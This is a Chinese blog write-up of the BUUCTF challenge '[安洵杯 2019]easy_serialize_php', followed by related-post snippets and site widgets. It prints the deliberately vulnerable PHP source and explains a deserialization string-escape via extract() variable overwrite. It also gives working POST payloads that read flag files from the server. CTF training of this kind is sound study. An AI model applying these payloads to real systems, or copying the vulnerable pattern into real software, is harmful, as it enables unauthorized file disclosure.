[安洵杯 2019]easy_serialize_php

最新推荐文章于 2023-03-30 10:44:51 发布
最新推荐文章于 2023-03-30 10:44:51 发布
阅读量474 收藏
点赞数
分类专栏: BUUCTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127349051
版权

进来点击source_code就可以看到源码

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}//简单的过滤


if($_SESSION){
    unset($_SESSION);
}//如果存在SESSION,则将其置空

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);//变量覆盖

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));//序列化之后再过滤

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

看extract()函数的功能:

如果post传参为_SESSION[flag]=123,那么$_SESSION["user"]和$_SESSION["function"]的值都会被覆盖

先看一下phpinfo有什么东西

这里有个d0g3_f1ag.php

再看

$serialize_info = filter(serialize($_SESSION));

...

}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

大佬的一段分析:

若SESSION参数:
$_SESSION["user"] = 'guestflagflagflagflag';
$_SESSION['function'] = 'aaaa';
$_SESSION['img']=base64_encode('guest_img.png');
序列化:
a:3:{s:4:"user";s:5:"guestflagflagflagflag";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter关键字会过滤掉flag,于是序列化字段会变短,过滤后的结果:
a:3:{s:4:"user";s:21:"guest";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于user字段值的长度仍为21,所有会往后吞21个字符,一直吞到guest";s:8:"function",那有没有一种可能我让function的值足够长能够包含我们指定为base64(dog3_flag.php)的img序列化的内容字段且被过滤掉关键字长度刚好能把img序列化字段吞进去,达到指定img赋值的效果?上栗子:
首先得让img序列包含在function中这样我们才能通过吞取赋值img的值,我们指定:
$_SESSION["user"] = 'guestflagflagflagflagflagflagflag';
$_SESSION['function'] = 'aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}';
在序列化SESSION得:
a:3:{s:4:"user";s:33:"guestflagflagflagflagflagflagflag";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter过滤的结果:
a:3:{s:4:"user";s:33:"guest";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于替换了7个flag关键字,会往后吞28个字符串,刚好将guest";s:8:"function";s:69:"aaaaa 赋给了user,后面构造img变量,后面是随便添加的一个变量,刚好满足三个变量,反序列化读取到webctf就结束了,后面的img被丢掉了。这样就完成了img的赋值。

所以payload:

?f=show_image
POST:_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}

然后查看页面源代码

flag在根目录下的d0g3_fllllllag

/d0g3_fllllllag的Base64编码为L2QwZzNfZmxsbGxsbGFn,更改img为L2QwZzNfZmxsbGxsbGFn,访问 

?f=show_image
POST:_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:3:"ctf";s:6:"webctf";}

 

 

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[wp][安洵 2019]easy_serialize_php
小飒的博客
07-05 110
[安洵 2019]easy_serialize_php f=phpinfo 得到 d0g3_f1ag.php ZDBnM19mMWFnLnBocA==在get ?f=show_image下 随便赋值 echo一下序列化 需要吞掉这一段 我一开始构造 _SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;} 发现不行,对比网上别人的payload发现必须function这
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3064
[安洵 2019]easy_serialize_php 反序列化
buuctf easy_serialize_php
qq_52671379的博客
03-30 1877
buuctf easy_serialize_php
[安洵 2019]easy_serialize_php--序列化绕过,extract()函数。
cainiao17441898的博客
06-06 337
解题: 打开源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESS
BUUCTF刷题记录(4)
bmth666的博客
04-12 1351
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
buuctf[安洵 2019]easy_serialize_php
最新发布
2202_75317918的博客
03-30 455
buuctf[安洵 2019]easy_serialize_php
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
se_mouz_image.rar_serialize_序列化
09-23
PHP中,`serialize()`函数就是用来将变量转化为字符串,这样就可以方便地存储或者通过网络发送。在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
php_igbinary-1.1.1到2.0.8版本大全
12-29
PHP_igbinary是一款高效的数据序列化扩展,专为PHP设计,用于替代默认的PHP序列化方式(如serialize和unserialize)。它的主要目的是提高在数据库存储、缓存系统以及跨进程通信中的性能,尤其是在大型和高负载的Web...
php_igbinary-1.1.1-5.6
12-26
`igbinary`扩展的核心功能在于替换传统的PHP序列化(serialize)和反序列化(unserialize)机制。传统的序列化方式会将PHP变量转化为ASCII字符串,这在处理大量数据时不仅占用更多存储空间,而且在读取和解析过程中...
BUUCTF - Web - easy_serialize_php
1tachi的博客
12-07 415
文章目录源码分析知识点payload其他解法 源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 448
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
easy_serialize_php
beihai2013
01-19 459
easy_serialize_php 考察:php代码审计,php序列化 打开页面,打开view-source,可以看到源代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace(
[安洵 2019]easy_serialize_php 1
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值